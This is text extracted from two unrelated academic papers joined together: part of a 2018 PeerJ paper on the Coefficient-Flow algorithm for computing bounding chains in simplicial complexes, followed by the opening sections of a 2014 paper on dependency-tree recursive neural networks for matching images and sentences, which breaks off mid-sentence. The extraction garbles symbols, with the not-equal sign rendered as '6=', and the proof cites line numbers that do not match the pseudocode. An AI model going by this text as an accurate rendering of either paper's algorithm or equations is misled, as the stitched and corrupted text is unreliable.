https://peerj.com http://dx.doi.org/10.7717/peerj-cs.153 Coefficient-Flow(p,σ0,v0): param: p — an n−1 boundary of the simplicial complex S param: σ0 — an n–simplex from where the calculation will start param: v0 — the value to assign the bounding chain at sigma return: c — a bounding chain of p satisfying cσ0 =v0 (if it exists) 6: initialize c and mark every n- and (n−1)-cell of S as not seen. 7: initialize an empty queue Q 8: let τ0∈∂σ0 9: enqueue (σ0,τ0,v0) into Q. 10: while Q is non-empty: 11: (σ,τ,v)←pop first element from Q 12: if σ has been marked seen: 13: if v 6=cσ : the problem has no solution 14: else: 15: if τ has been marked seen: skip 16: cσ ←v 17: mark τ and σ as seen 18: for each τ ′∈∂σ : 19: if σ is the only coface of τ ′: 20: mark τ ′ as seen 21: if pτ ′ 6=〈∂σ,τ ′〉v : the problem has no solution 22: else: 23: if τ ′ has not been marked as seen: 24: σ ′←other coface of τ ′ 25: v′←〈∂σ ′,τ〉(pτ −〈∂σ,τ〉v) 26: enqueue (σ ′,τ ′,v′) into Q 27: return c Proof. We start by proving the bound on the number of executions of the main loop. This is guaranteed by the fact that the loop is executed while the queue is non-empty, and a triple (σ,τ,v) can only be inserted in line (21) if τ has not been marked as seen. Furthermore, since τ has at most two cofaces, say, σ,σ ′, we can only enqueue τ if we are analyzing σ or σ ′ and so for each τ , at most two elements are placed in the queue, and hence the main loop gets executed at most 2|S(n−1)| times. To prove correctness of the algorithm, we have to prove that it outputs an error if and only if the problem has no solution, and otherwise it outputs a bounding chain of p with cσ0 =v. First, we note that if a face σ is marked as seen, the value of cσ can never be reassigned. This is because the program branches on whether or not σ has been marked as seen, and cσ can only be assigned on line (11) which is bypassed if σ has been previously marked as seen. From this fact we conclude that cσ0 =v0 as it is assigned on line (11) and σ0 is marked as seen in the first iteration of the main loop. Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 6/12 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.153 Second, note that there is an edge between two n-faces in the dual graph if and only if they share an (n−1)-face. This implies that as we execute the algorithm, analyze a new n-face σ and successfully add the other cofaces of elements of the boundary of σ , we add the vertices neighboring σ in the dual graph. Since the dual graph is connected all of the nodes in the graph are eventually added, and hence all of the n-faces are analyzed. Third, we note that for any pair (τ,σ) with dimσ =n and τ C σ , either σ is the only coface of τ , or τ has another coface, σ ′. In the first case, if pτ 6= cσ〈τ,∂σ〉 an error is detected on line (16). In the second case, assuming that the triple (σ,τ,v) is enqueued before (σ ′,τ,v′) we have v′=〈∂σ ′,τ〉(pτ −〈∂,σ〉v) as is assigned in line (20) then (dc)τ =〈∂σ,τ〉v+〈∂σ ′ ,τ〉v′ =〈∂σ,τ〉v+〈∂σ ′,τ〉(〈∂σ ′,τ〉(pτ −〈∂,σ〉v)) =〈∂σ,τ〉v+pτ −〈∂σ,τ〉v =pτ. Finally, since upon the successful return of the algorithm, this equation must be satisfied by every pair τ Cσ , it must be the case that dc =p. If this is not the case, then there will be an error in line (08) and the algorithm will abort. � Note that the connectivity condition can be removed if we instead require a value for one cell in each connected component of the graph G(S), and throw an error in case there is an (n−1)-simplex τ with no cofaces, such that pτ 6=0. Furthermore, the algorithm can be easily parallelized using a thread pool that iteratively processes elements from the queue. Finally, in the case where it is known that S has an (n−1)-face τ with a single coface, we do not need to specify σ or v in Coefficient-Flow, and instead use the fact that we know the relationship between the coefficient pτ and that of its coface in a bounding chain c of p, i.e., pτ =〈∂σ,τ〉cσ . This proves Corollary 1. Bounding-Chain(p): param: p — an n−1 boundary of the simplicial complex S return: c — a bounding chain of p 28: for each τ ∈Sn−1: 29: if τ has a single coface: 30: σ ← the coface of τ 31: v ←〈∂σ,τ〉pτ 32: break loop 33: c ←Coefficient-Flow(p,σ,v) 34: returnc Corollary 1. If S is a connected n-manifold-like simplicial complex with a connected dual graph, and has an (n−1)-face with a single coface, then given an (n−1)-cycle p on S, Bounding-Chain(p) returns a bounding chain of p if one exists. Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 7/12 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.153 Implementation details We will now discuss some of the choices made in our implementation of the Coefficient- Flow algorithm (https://www.github.com/crvs/coeff-flow). Before we can address the problem of considering chains on a simplicial complex we first need to have a model of a simplicial complex. For this, we decided to use a simplex tree model (Boissonnat & Maria, 2014) provided by the GUDHI library (The GUDHI Project, 2015) as it provides a compact representation of a simplicial complex (the number of nodes in the tree is in bijection with the number of simplices) which allows us to quickly get the enumeration of a given simplex σ . Indeed, the complexity of calculating ιk(σ) is in O(dimσ). It is important to compute the enumeration quickly because in our implementation of Coefficient-Flow we use arrays of booleans to keep track of which faces of the simplicial complex have been seen before, as well as numerical arrays to store the coefficients of the cycle and its bounding chain, which need to be consulted at every iteration of the loop. However, finding the cofaces of the simplicial complex is not as easy in a simplex tree, since, if σ =[pi0:ik], this would require to search every child of the root node of the tree that has an index smaller than i0, followed by every child of the node associated with pi0 and so on, which in the worst case scenario is in O(dimσ|S(0)|). Thus we need to adopt a different method. For this, we keep a Hasse diagram of the face relation which comprises a directed graph whose vertices are nodes in the simplex tree and has edges from each face to its codimension-1 cofaces (see for instance Di Battista & Tamassia (1988)) for more details of this data-structure). This allows us to find the codimension-1 cofaces of a simplex of S in O(1) with a space overhead in O(|S|). With these elements in place, we can analyze the complexity of our implementation of the Coefficient-Flow algorithm in full: Lemma 1. The Coefficient-Flow algorithm using a simplex tree and a Hasse diagram has computational (time) complexity O(d2|S(d−1)|) where d=dimS. Proof. In Proposition 2 we saw that the Coefficient-Flow algorithm executes the main loop at most O(|S(d)|) times, so we only need to measure the complexity of the main loop, in order to obtain its time complexity. This can be done by checking which are the costly steps: • In lines (07) and (10) checking whether a face has been marked as seen requires first computing ιk(τ) which, as we stated above, has time complexity O(k), with k≤d. • In line (13), computing the faces of a simplex σ requires O(dimσ2) steps, and yields a list of size dimσ , hence the inner loop (13–21) is executed dimσ times, where dimσ =d, for each element placed in the queue. • The loop (13–21) requires once again, computing ι(τ ′), and 〈∂σ,τ〉, each of these operations, as we explained before, carries a time complexity O(d). • All other operations have complexity O(1). Composing these elements, the total complexity of one iteration of the main loop is O(max{d,d2,d ·d}) = O(d2), which yields a final complexity for the proposed implementation, of O(d2|S(d−1)|). � Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 8/12 https://peerj.com https://www.github.com/crvs/coeff-flow http://dx.doi.org/10.7717/peerj-cs.153 2We use the least squares conjugate gradient descent method to solve the system. Figure 1 Examples of bounding chains: the edges in blue form cycles in the mesh, and the faces in red form the corresponding bounding chain as computed by the Coefficient-Flow algorithm. In (A) we depict the mesh of the Stanford Bunny The Stanford 3D scanning repository (1994) and in (B) we show the mesh of a Bee Smithsonian (2013). In both these meshes we depict examples of bounding chains, where the edges in blue form cycles, and the faces in red form the corresponding bounding chain as computed by the Coefficient-Flow algorithm. In both cases the depicted bounding chains correspond to the op- timal bounding chains (w.r.t. the number of faces), these can by obtained by choosing σ0 and v0 so as to yield the desired chain. In this case, since the two complexes are topological spheres and the cycles are sim- ple cycles (meaning they are connected and do not self-intersect), there are only two possible bounding chains that do not include all the faces of the complex, which can be obtained by running the algorithm three times, choosing σ0 arbitrarily, and setting v0 to be 0,n or−n where n = maxτ∈S(1)|pτ|. In the case of non-simple cycles, more alternatives would exist. Full-size DOI: 10.7717/peerjcs.153/fig-1 Example runs and tests In Fig. 1 we provide an example of the output of the Coefficient-Flow algorithm for the mesh of the Stanford bunny (The Stanford 3D scanning repository, 1994) and the eulaema meriana bee model from the Smithsonian 3D model library (Smithsonian, 2013). For comparison, we performed the same experiments using the Eigen linear algebra library (Eigen, 2017) to solve the underlying linear system,2 and summarized the results in Table 1. This allowed us to see that even though both approaches remain feasible with relatively large meshes, solving the linear system consistently underperforms using the Coefficient-Flow algorithm. Even though Coefficient-Flow is expected to outperform a linear system solver (an exact solution to a linear system has �(n2) time complexity), we wanted to test it against an approximate sparse system solver. Such solvers (e.g., conjugate gradient descent (Gloub & Van Loan, 1996)) rely on iterative matrix products, which in the case of boundary matrices of dimension d can be performed in O((d+1)n) where n is the number of d-dimensional simplices, placing the complexity of the method in �((d+1)n). In order to observe the difference in complexity class we performed randomized tests on both implementations. Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 9/12 https://peerj.com https://doi.org/10.7717/peerjcs.153/fig-1 http://dx.doi.org/10.7717/peerj-cs.153 3Since boundary matrices are naturally sparse, and we are computing an approximate solution, the complexity can be improved beyond the aforementioned �(n2). Table 1 Timing for computation of bounding chains using Coefficient-Flow, and using Eigen in several meshes. ‘‘Bunny’’ and ‘‘Bee (Sample)/Bee (Full)’’ refer to the meshes in Figs. 1A and 1B, respec- tively. The mesh ‘‘Bee (Full)’’ is the one obtained from Smithsonian (2013), whereas the one labeled ‘‘Bee (Sample)’’ is a sub-sampled version of it. Mesh Faces Edges Vertices Eigen Coefficient-Flow Bunny 69 663 104 496 34 834 2.073 (s) 0.48911 (s) Bee (Sample) 499 932 749 898 249 926 116.553 (s) 3.04668 (s) Bee (Full) 999 864 1 499 796 499 892 595.023 (s) 7.15014 (s) Figure 2 Running times for a calculating the bounding chain of a cycle as a function of the number of edges (A), and Log–log plot of the same data (B). Full-size DOI: 10.7717/peerjcs.153/fig-2 In this scenario we made a mesh on a unit square from a random sample. By varying the number of points sampled from the square, we effectively varied the resolution of the mesh. Finally, at each resolution level we snapped a cycle onto the mesh, and computed its bounding chain using both Coefficient-Flow and by solving the sparse linear system as before. We plotted the timings in Fig. 2 from where we can experimentally observe the difference in the complexity class between our algorithm and the solution to the sparse linear system. Furthermore by analyzing the Log-Log plot in Fig. 2B, we can confirm our complexity estimates by analyzing the slope of the lines where the samples are distributed, i.e., solving the sparse linear system is approximately O(n1.7) complexity,3 whereas Coefficient-Flow displays linear complexity. CONCLUSION AND FUTURE WORK While the problem of finding a bounding chain for a given cycle in a simplicial complex remains a challenging one for large complexes, we showed that this problem can be solved efficiently for codimension-1 boundaries. We implemented and tested our algorithm and have provided complexity bounds for its run-time. However, this leaves open the question of finding bounding chains for boundaries of higher codimension, for which solving a large sparse linear system is still, to the best of our knowledge, the only feasible approach, save for codimension 2 cycles in dimension Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 10/12 https://peerj.com https://doi.org/10.7717/peerjcs.153/fig-2 http://dx.doi.org/10.7717/peerj-cs.153 3 (Rodríguez et al., 2017). In the future we would like to generalize our algorithm to be able to work with cobounding cochains (i.e., in cohomology), as well as considering the optimality question (i.e., finding the minimal bounding chain w.r.t. some cost function). ADDITIONAL INFORMATION AND DECLARATIONS Funding This work has been supported by the Knut and Alice Wallenberg Foundation and the Swedish Research Council. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Knut and Alice Wallenberg Foundation. Swedish Research Council. Competing Interests The authors declare there are no competing interests. Author Contributions • J. Frederico Carvalho conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Mikael Vejdemo-Johansson, Danica Kragic and Florian T. Pokorny authored or reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Github: https://www.github.com/crvs/coeff-flow. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.153#supplemental-information. REFERENCES Boissonnat J-D, Maria C. 2014. The simplex tree: an efficient data structure for general simplicial complexes. Algorithmica 70(3):406–427. Chambers EW, Erickson J, Nayyeri A. 2009. Minimum cuts and shortest homologous cycles. In: Symposium on Computational geometry DOI 10.1145/1542362.1542426. Chambers EW, Vejdemo-Johansson M. 2015. Computing minimum area ho- mologies. In: Computer graphics forum, vol. 34. Wiley Online Library, 13–21 DOI 10.1111/cgf.12514. Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 11/12 https://peerj.com https://www.github.com/crvs/coeff-flow http://dx.doi.org/10.7717/peerj-cs.153#supplemental-information http://dx.doi.org/10.7717/peerj-cs.153#supplemental-information http://dx.doi.org/10.1145/1542362.1542426 http://dx.doi.org/10.1111/cgf.12514 http://dx.doi.org/10.7717/peerj-cs.153 Chambers EW, Wang Y. 2013. Measuring similarity between curves on 2-manifolds via homotopy area. SoCG ’13. In: Proceeding of the twenty-ninth annual symposium on computational geometry. New York: ACM, 425–434 DOI 10.1145/2462356.2462375. Chen C, Freedman D. 2011. Hardness results for homology localization. Discrete and Computational Geometry 45(3):425–448 DOI 10.1007/s00454-010-9322-8. Davie AM, Stothers AJ. 2013. Improved bound for complexity of matrix multiplication. Proceedings of the Royal Society of Edinburgh Section A: Mathematics 143(2):351–369 DOI 10.1017/S0308210511001648. Dey TK, Hirani AN, Krishnamoorthy B. 2011. Optimal homologous cycles, total uni- modularity, and linear programming. SIAM Journal on Computing 40(4):1026–1044 DOI 10.1137/100800245. Di Battista G, Tamassia R. 1988. Algorithms for plane representations of acyclic digraphs. Theoretical Computer Science 61(2) DOI 10.1016/0304-3975(88)90123-5. Edelsbrunner H, Harer J. 2010. Computational topology: an introduction. Providence: American Mathematical Soc. Edelsbrunner H, Letscher D, Zomorodian A. 2002. Topological persistence and simplification. Discrete & Computational Geometry 28(4):511–533. Eigen. 2017. Version 3.3.2. Available at http://eigen.tuxfamily.org/ . Forman R. 1998. Morse theory for cell complexes. Advances in Mathematics 134(1):90–145 DOI 10.1006/aima.1997.1650. Gloub GH, Van Loan CF. 1996. Matrix computations. 3rd edition. London: Johns Hopkins University Press. Hatcher A. 2002. Algebraic topology. 2nd edition. Cambridge: Cambridge University Press. Pokorny FT, Hawasly M, Ramamoorthy S. 2016. Topological trajectory classification with filtrations of simplicial complexes and persistent homology. International Journal of Robotics Research 35(1–3):204–223 DOI 10.1177/0278364915586713. Rodríguez AA, Bertolazzi E, Ghiloni R, Specogna R. 2017. Efficient construction of 2- chains with a prescribed boundary. Journal of Numerical Analysis 55(3):1159–1187 DOI 10.1137/15M1025955. Smithsonian X. 2013. 3D: Eulaema meriana bee, Smithsonian gardens. Available at https://3d.si.edu. The GUDHI Project. 2015. GUDHI user and reference manual. GUDHI Editorial Board Available at http://gudhi.gforge.inria.fr/doc/latest/ . The Stanford 3D scanning repository. 1994. Available at https://graphics.stanford.edu/ data/3Dscanrep/ . Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 12/12 https://peerj.com http://dx.doi.org/10.1145/2462356.2462375 http://dx.doi.org/10.1007/s00454-010-9322-8 http://dx.doi.org/10.1017/S0308210511001648 http://dx.doi.org/10.1137/100800245 http://dx.doi.org/10.1016/0304-3975(88)90123-5 http://eigen.tuxfamily.org/ http://dx.doi.org/10.1006/aima.1997.1650 http://dx.doi.org/10.1177/0278364915586713 http://dx.doi.org/10.1137/15M1025955 https://3d.si.edu http://gudhi.gforge.inria.fr/doc/latest/ https://graphics.stanford.edu/data/3Dscanrep/ https://graphics.stanford.edu/data/3Dscanrep/ http://dx.doi.org/10.7717/peerj-cs.153 work_mg56pigmxrfjtj5dkcxnsr4xhu ---- Grounded Compositional Semantics for Finding and Describing Images with Sentences Grounded Compositional Semantics for Finding and Describing Images with Sentences Richard Socher, Andrej Karpathy, Quoc V. Le*, Christopher D. Manning, Andrew Y. Ng Stanford University, Computer Science Department, *Google Inc. richard@socher.org, karpathy@cs.stanford.edu, qvl@google.com, manning@stanford.edu, ang@cs.stanford.edu Abstract Previous work on Recursive Neural Networks (RNNs) shows that these models can produce compositional feature vectors for accurately representing and classifying sentences or im- ages. However, the sentence vectors of previ- ous models cannot accurately represent visu- ally grounded meaning. We introduce the DT- RNN model which uses dependency trees to embed sentences into a vector space in order to retrieve images that are described by those sentences. Unlike previous RNN-based mod- els which use constituency trees, DT-RNNs naturally focus on the action and agents in a sentence. They are better able to abstract from the details of word order and syntactic expression. DT-RNNs outperform other re- cursive and recurrent neural networks, kernel- ized CCA and a bag-of-words baseline on the tasks of finding an image that fits a sentence description and vice versa. They also give more similar representations to sentences that describe the same image. 1 Introduction Single word vector spaces are widely used (Turney and Pantel, 2010) and successful at classifying sin- gle words and capturing their meaning (Collobert and Weston, 2008; Huang et al., 2012; Mikolov et al., 2013). Since words rarely appear in isolation, the task of learning compositional meaning repre- sentations for longer phrases has recently received a lot of attention (Mitchell and Lapata, 2010; Socher et al., 2010; Socher et al., 2012; Grefenstette et al., 2013). Similarly, classifying whole images into a fixed set of classes also achieves very high perfor- mance (Le et al., 2012; Krizhevsky et al., 2012). However, similar to words, objects in images are of- ten seen in relationships with other objects which are not adequately described by a single label. In this work, we introduce a model, illustrated in Fig. 1, which learns to map sentences and images into a common embedding space in order to be able to retrieve one from the other. We assume word and image representations are first learned in their re- spective single modalities but finally mapped into a jointly learned multimodal embedding space. Our model for mapping sentences into this space is based on ideas from Recursive Neural Networks (RNNs) (Pollack, 1990; Costa et al., 2003; Socher et al., 2011b). However, unlike all previous RNN models which are based on constituency trees (CT- RNNs), our model computes compositional vector representations inside dependency trees. The com- positional vectors computed by this new dependency tree RNN (DT-RNN) capture more of the meaning of sentences, where we define meaning in terms of similarity to a “visual representation” of the textual description. DT-RNN induced vector representa- tions of sentences are more robust to changes in the syntactic structure or word order than related mod- els such as CT-RNNs or Recurrent Neural Networks since they naturally focus on a sentence’s action and its agents. We evaluate and compare DT-RNN induced rep- resentations on their ability to use a sentence such as “A man wearing a helmet jumps on his bike near a beach.” to find images that show such a scene. The goal is to learn sentence representations that capture 207 Transactions of the Association for Computational Linguistics, 2 (2014) 207–218. Action Editor: Alexander Clark. Submitted 10/2013; Revised 3/2014; Published 4/2014. c©2014 Association for Computational Linguistics. A man wearing a helmet jumps on his bike near a beach. Compositional Sentence Vectors Two airplanes parked in an airport. A man jumping his downhill bike. Image Vector Representation A small child sits on a cement wall near white flower. Multi-Modal Representations Figure 1: The DT-RNN learns vector representations for sentences based on their dependency trees. We learn to map the outputs of convolutional neural networks applied to images into the same space and can then compare both sentences and images. This allows us to query images with a sentence and give sentence descriptions to images. the visual scene described and to find appropriate images in the learned, multi-modal sentence-image space. Conversely, when given a query image, we would like to find a description that goes beyond a single label by providing a correct sentence describ- ing it, a task that has recently garnered a lot of at- tention (Farhadi et al., 2010; Ordonez et al., 2011; Kuznetsova et al., 2012). We use the dataset intro- duced by (Rashtchian et al., 2010) which consists of 1000 images, each with 5 descriptions. On all tasks, our model outperforms baselines and related mod- els. 2 Related Work The presented model is connected to several areas of NLP and vision research, each with a large amount of related work to which we can only do some justice given space constraints. Semantic Vector Spaces and Their Composition- ality. The dominant approach in semantic vec- tor spaces uses distributional similarities of single words. Often, co-occurrence statistics of a word and its context are used to describe each word (Turney and Pantel, 2010; Baroni and Lenci, 2010), such as tf-idf. Most of the compositionality algorithms and related datasets capture two-word compositions. For instance, (Mitchell and Lapata, 2010) use two- word phrases and analyze similarities computed by vector addition, multiplication and others. Compo- sitionality is an active field of research with many different models and representations being explored (Grefenstette et al., 2013), among many others. We compare to supervised compositional models that can learn task-specific vector representations such as constituency tree recursive neural networks (Socher et al., 2011b; Socher et al., 2011a), chain structured recurrent neural networks and other baselines. An- other alternative would be to use CCG trees as a backbone for vector composition (K.M. Hermann, 2013). Multimodal Embeddings. Multimodal embed- ding methods project data from multiple sources such as sound and video (Ngiam et al., 2011) or im- ages and text. Socher et al. (Socher and Fei-Fei, 2010) project words and image regions into a com- mon space using kernelized canonical correlation analysis to obtain state of the art performance in an- notation and segmentation. Similar to our work, they use unsupervised large text corpora to learn seman- tic word representations. Among other recent work is that by Srivastava and Salakhutdinov (2012) who developed multimodal Deep Boltzmann Machines. Similar to their work, we use techniques from the broad field of deep learning to represent images and words. Recently, single word vector embeddings have been used for zero shot learning (Socher et al., 2013c). Mapping images to word vectors enabled their system to classify images as depicting objects such as ”cat” without seeing any examples of this class. Related work has also been presented at NIPS (Socher et al., 2013b; Frome et al., 2013). This work moves zero-shot learning beyond single categories per image and extends it to unseen phrases and full length sentences, making use of similar ideas of se- mantic spaces grounded in visual knowledge. 208 Detailed Image Annotation. Interactions be- tween images and texts is a growing research field. Early work in this area includes generating single words or fixed phrases from images (Duygulu et al., 2002; Barnard et al., 2003) or using contextual in- formation to improve recognition (Gupta and Davis, 2008; Torralba et al., 2010). Apart from a large body of work on single object image classification (Le et al., 2012), there is also work on attribute classification and other mid-level elements (Kumar et al., 2009), some of which we hope to capture with our approach as well. Our work is close in spirit with recent work in de- scribing images with more detailed, longer textual descriptions. In particular, Yao et al. (2010) describe images using hierarchical knowledge and humans in the loop. In contrast, our work does not require hu- man interactions. Farhadi et al. (2010) and Kulkarni et al. (2011), on the other hand, use a more automatic method to parse images. For instance, the former ap- proach uses a single triple of objects estimated for an image to retrieve sentences from a collection written to describe similar images. It forms representations to describe 1 object, 1 action, and 1 scene. Kulkarni et al. (2011) extends their method to describe an im- age with multiple objects. None of these approaches have used a compositional sentence vector repre- sentation and they require specific language gener- ation techniques and sophisticated inference meth- ods. Since our model is based on neural networks in- ference is fast and simple. Kuznetsova et al. (2012) use a very large parallel corpus to connect images and sentences. Feng and Lapata (2013) use a large dataset of captioned images and experiments with both extractive (search) and abstractive (generation) models. Most related is the very recent work of Hodosh et al. (2013). They too evaluate using a ranking mea- sure. In our experiments, we compare to kernelized Canonical Correlation Analysis which is the main technique in their experiments. 3 Dependency-Tree Recursive Neural Networks In this section we first focus on the DT-RNN model that computes compositional vector representations for phrases and sentences of variable length and syn- tactic type. In section 5 the resulting vectors will then become multimodal features by mapping im- ages that show what the sentence describes to the same space and learning both the image and sen- tence mapping jointly. The most common way of building representa- tions for longer phrases from single word vectors is to simply linearly average the word vectors. While this bag-of-words approach can yield reasonable performance in some tasks, it gives all the words the same weight and cannot distinguish important dif- ferences in simple visual descriptions such as The bike crashed into the standing car. vs. The car crashed into the standing bike.. RNN models (Pollack, 1990; Goller and Küchler, 1996; Socher et al., 2011b; Socher et al., 2011a) pro- vided a novel way of combining word vectors for longer phrases that moved beyond simple averag- ing. They combine vectors with an RNN in binary constituency trees which have potentially many hid- den layers. While the induced vector representations work very well on many tasks, they also inevitably capture a lot of syntactic structure of the sentence. However, the task of finding images from sentence descriptions requires us to be more invariant to syn- tactic differences. One such example are active- passive constructions which can collapse words such as “by” in some formalisms (de Marneffe et al., 2006), relying instead on the semantic relationship of “agent”. For instance, The mother hugged her child. and The child was hugged by its mother. should map to roughly the same visual space. Cur- rent Recursive and Recurrent Neural Networks do not exhibit this behavior and even bag of words rep- resentations would be influenced by the words was and by. The model we describe below focuses more on recognizing actions and agents and has the po- tential to learn representations that are invariant to active-passive differences. 3.1 DT-RNN Inputs: Word Vectors and Dependency Trees In order for the DT-RNN to compute a vector repre- sentation for an ordered list of m words (a phrase or sentence), we map the single words to a vector space and then parse the sentence. First, we map each word to a d-dimensional vec- tor. We initialize these word vectors with the un- 209 A man wearing a helmet jumps on his bike near a beach det nsubj partmod det dobj root prep poss pobj prep det pobj Figure 2: Example of a full dependency tree for a longer sentence. The DT-RNN will compute vector representations at every word that represents that word and an arbitrary number of child nodes. The final representation is computed at the root node, here at the verb jumps. Note that more important activity and object words are higher up in this tree structure. supervised model of Huang et al. (2012) which can learn single word vector representations from both local and global contexts. The idea is to construct a neural network that outputs high scores for windows and documents that occur in a large unlabeled corpus and low scores for window-document pairs where one word is replaced by a random word. When such a network is optimized via gradient descent the derivatives backpropagate into a word embedding matrix A which stores word vectors as columns. In order to predict correct scores the vectors in the ma- trix capture co-occurrence statistics. We use d = 50 in all our experiments. The embedding matrix X is then used by finding the column index i of each word: [w] = i and retrieving the corresponding col- umn xw from X. Henceforth, we represent an input sentence s as an ordered list of (word,vector) pairs: s = ((w1,xw1 ), . . . , (wm,xwm )). Next, the sequence of words (w1, . . . ,wm) is parsed by the dependency parser of de Marneffe et al. (2006). Fig. 2 shows an example. We can represent a dependency tree d of a sentence s as an ordered list of (child,parent) indices: d(s) = {(i,j)}, where every child word in the sequence i = 1, . . . ,m is present and has any word j ∈ {1, . . . ,m}∪ {0} as its parent. The root word has as its parent 0 and we notice that the same word can be a parent between zero and m number of times. Without loss of generality, we assume that these in- dices form a tree structure. To summarize, the input to the DT-RNN for each sentence is the pair (s,d): the words and their vectors and the dependency tree. 3.2 Forward Propagation in DT-RNNs Given these two inputs, we now illustrate how the DT-RNN computes parent vectors. We will use the following sentence as a running example: Students1 ride2 bikes3 at4 night5. Fig. 3 shows its tree and computed vector representations. The depen- Students bikes night ride at x1 x2 x3 x4 x5 h1 h2 h3 h4 h5 Figure 3: Example of a DT-RNN tree structure for com- puting a sentence representation in a bottom up fashion. dency tree for this sentence can be summarized by the following set of (child, parent) edges: d = {(1, 2), (2, 0), (3, 2), (4, 2), (5, 4)}. The DT-RNN model will compute parent vectors at each word that include all the dependent (chil- dren) nodes in a bottom up fashion using a com- positionality function gθ which is parameterized by all the model parameters θ. To this end, the algo- rithm searches for nodes in a tree that have either (i) no children or (ii) whose children have already been computed and then computes the correspond- ing vector. In our example, the words x1,x3,x5 are leaf nodes and hence, we can compute their correspond- ing hidden nodes via: hc = gθ(xc) = f(Wvxc) for c = 1, 3, 5, (1) where we compute the hidden vector at position c via our general composition function gθ. In the case of leaf nodes, this composition function becomes simply a linear layer, parameterized by Wv ∈ Rn×d, followed by a nonlinearity. We cross-validate over using no nonlinearity (f = id), tanh, sigmoid or rectified linear units (f = max(0,x), but generally find tanh to perform best. The final sentence representation we want to com- pute is at h2, however, since we still do not have h4, 210 we compute that one next: h4 = gθ(x4,h5) = f(Wvx4 + Wr1h5), (2) where we use the same Wv as before to map the word vector into hidden space but we now also have a linear layer that takes as input h5, the only child of the fourth node. The matrix Wr1 ∈ Rn×n is used because node 5 is the first child node on the right side of node 4. Generally, we have multiple matri- ces for composing with hidden child vectors from the right and left sides: Wr· = (Wr1, . . . ,Wrkr ) and Wl· = (Wl1, . . . ,Wlkl ). The number of needed ma- trices is determined by the data by simply finding the maximum numbers of left kl and right kr chil- dren any node has. If at test time a child appeared at an even large distance (this does not happen in our test set), the corresponding matrix would be the identity matrix. Now that all children of h2 have their hidden vec- tors, we can compute the final sentence representa- tion via: h2 = gθ(x2,h1,h3,h4) = (3) f(Wvx2 + Wl1h1 + Wr1h3 + Wr2h4). Notice that the children are multiplied by matrices that depend on their location relative to the current node. Another modification that improves the mean rank by approximately 6 in image search on the dev set is to weight nodes by the number of words under- neath them and normalize by the sum of words under all children. This encourages the intuitive desidera- tum that nodes describing longer phrases are more important. Let `(i) be the number of leaf nodes (words) under node i and C(i,y) be the set of child nodes of node i in dependency tree y. The final com- position function for a node vector hi becomes: hi = f   1 `(i)  Wvxi + ∑ j∈C(i) `(j)Wpos(i,j)hj     , (4) where by definition `(i) = 1 + ∑ j∈C(i) `(j) and pos(i,j) is the relative position of child j with re- spect to node i, e.g. l1 or r2 in Eq. 3. 3.3 Semantic Dependency Tree RNNs An alternative is to condition the weight matrices on the semantic relations given by the dependency parser. We use the collapsed tree formalism of the Stanford dependency parser (de Marneffe et al., 2006). With such a semantic untying of the weights, the DT-RNN makes better use of the dependency formalism and could give active-passive reversals similar semantic vector representation. The equation for this semantic DT-RNN (SDT-RNN) is the same as the one above except that the matrices Wpos(i,j) are replaced with matrices based on the dependency relationship. There are a total of 141 unique such relationships in the dataset. However, most are very rare. For examples of semantic relationships, see Fig. 2 and the model analysis section 6.7. This forward propagation can be used for com- puting compositional vectors and in Sec. 5 we will explain the objective function in which these are trained. 3.4 Comparison to Previous RNN Models The DT-RNN has several important differences to previous RNN models of Socher et al. (2011a) and (Socher et al., 2011b; Socher et al., 2011c). These constituency tree RNNs (CT-RNNs) use the follow- ing composition function to compute a hidden par- ent vector h from exactly two child vectors (c1,c2) in a binary tree: h = f ( W [ c1 c2 ]) , where W ∈ Rd×2d is the main parameter to learn. This can be rewritten to show the similarity to the DT-RNN as h = f(Wl1c1 + Wr1c2). However, there are several important differences. Note first that in previous RNN models the par- ent vectors were of the same dimensionality to be recursively compatible and be used as input to the next composition. In contrast, our new model first maps single words into a hidden space and then par- ent nodes are composed from these hidden vectors. This allows a higher capacity representation which is especially helpful for nodes that have many chil- dren. Secondly, the DT-RNN allows for n-ary nodes in the tree. This is an improvement that is possible even for constituency tree CT-RNNs but it has not been explored in previous models. Third, due to computing parent nodes in con- stituency trees, previous models had the problem that words that are merged last in the tree have a larger weight or importance in the final sentence rep- 211 Figure 4: The architecture of the visual model. This model has 3 sequences of filtering, pooling and local contrast normalization layers. The learnable parameters are the filtering layer. The filters are not shared, i.e., the network is nonconvolutional. resentation. This can be problematic since these are often simple non-content words, such as a leading ‘But,’. While such single words can be important for tasks such as sentiment analysis, we argue that for describing visual scenes the DT-RNN captures the more important effects: The dependency tree struc- tures push the central content words such as the main action or verb and its subject and object to be merged last and hence, by construction, the final sentence representation is more robust to less important ad- jectival modifiers, word order changes, etc. Fourth, we allow some untying of weights de- pending on either how far away a constituent is from the current word or what its semantic relationship is. Now that we can compute compositional vector representations for sentences, the next section de- scribes how we represent images. 4 Learning Image Representations with Neural Networks The image features that we use in our experiments are extracted from a deep neural network, replicated from the one described in (Le et al., 2012). The net- work was trained using both unlabeled data (random web images) and labeled data to classify 22,000 cat- egories in ImageNet (Deng et al., 2009). We then used the features at the last layer, before the classi- fier, as the feature representation in our experiments. The dimension of the feature vector of the last layer is 4,096. The details of the model and its training procedures are as follows. The architecture of the network can be seen in Figure 4. The network takes 200x200 pixel images as inputs and has 9 layers. The layers consist of three sequences of filtering, pooling and local con- trast normalization (Jarrett et al., 2009). The pooling function is L2 pooling of the previous layer (taking the square of the filtering units, summing them up in a small area in the image, and taking the square- root). The local contrast normalization takes inputs in a small area of the lower layer, subtracts the mean and divides by the 